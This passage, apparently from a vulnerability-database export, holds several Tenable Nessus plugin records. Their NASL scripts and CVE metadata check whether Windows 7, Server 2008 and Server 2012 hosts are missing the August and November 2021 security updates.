exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005095',\n '5005090'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005095, 5005090])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:01", "description": "The remote Windows host is missing security update 5007246 or cumulative update 5007263. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007246: Windows Server 2008 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007246.NASL", "href": "https://www.tenable.com/plugins/nessus/154983", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154983);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007246\");\n script_xref(name:\"MSKB\", value:\"5007263\");\n script_xref(name:\"MSFT\", value:\"MS21-5007246\");\n script_xref(name:\"MSFT\", value:\"MS21-5007263\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007246: Windows Server 2008 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007246\nor cumulative update 5007263. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007246\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007246 or Cumulative Update KB5007263.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38666\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007246', '5007263');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007246, 5007263])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:01", "description": "The remote Windows host is missing security update 5007233 or cumulative update 5007236. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007233: Windows 7 and Windows Server 2008 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007233.NASL", "href": "https://www.tenable.com/plugins/nessus/154984", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154984);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007233\");\n script_xref(name:\"MSKB\", value:\"5007236\");\n script_xref(name:\"MSFT\", value:\"MS21-5007233\");\n script_xref(name:\"MSFT\", value:\"MS21-5007236\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007233: Windows 7 and Windows Server 2008 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007233\nor cumulative update 5007236. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42285, CVE-2021-42287,\n CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007233\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007233 or Cumulative Update KB5007236.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007233', '5007236');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007233, 5007236])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:06", "description": "The remote Windows host is missing security update 5005089 or cumulative update 5005088. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. 
An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005089.NASL", "href": "https://www.tenable.com/plugins/nessus/152436", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152436);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005088\");\n script_xref(name:\"MSKB\", value:\"5005089\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005088\");\n script_xref(name:\"MSFT\", value:\"MS21-5005089\");\n\n script_name(english:\"KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005089\nor cumulative update 5005088. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. 
(CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005089-security-only-update-28805642-8266-40f9-a2be-9003329f661c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?383d9541\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005088-monthly-rollup-69ec750d-30ee-4cbd-82eb-0b1ec2fd5f78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d931097\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005089 or Cumulative Update KB5005088.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005089',\n '5005088'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005089, 5005088])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": 
"NONE"}}, {"lastseen": "2023-05-18T15:35:38", "description": "The remote Windows host is missing security update 5007245 or cumulative update 5007260. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007245: Windows Server 2012 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007245.NASL", "href": "https://www.tenable.com/plugins/nessus/154995", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154995);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007245\");\n script_xref(name:\"MSKB\", value:\"5007260\");\n script_xref(name:\"MSFT\", value:\"MS21-5007245\");\n script_xref(name:\"MSFT\", value:\"MS21-5007260\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007245: Windows Server 2012 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007245\nor cumulative update 5007260. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. 
An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007260\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007245 or Cumulative Update 5007260.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright 
(C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-11\";\nvar kbs = make_list('5007245', '5007260');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname) 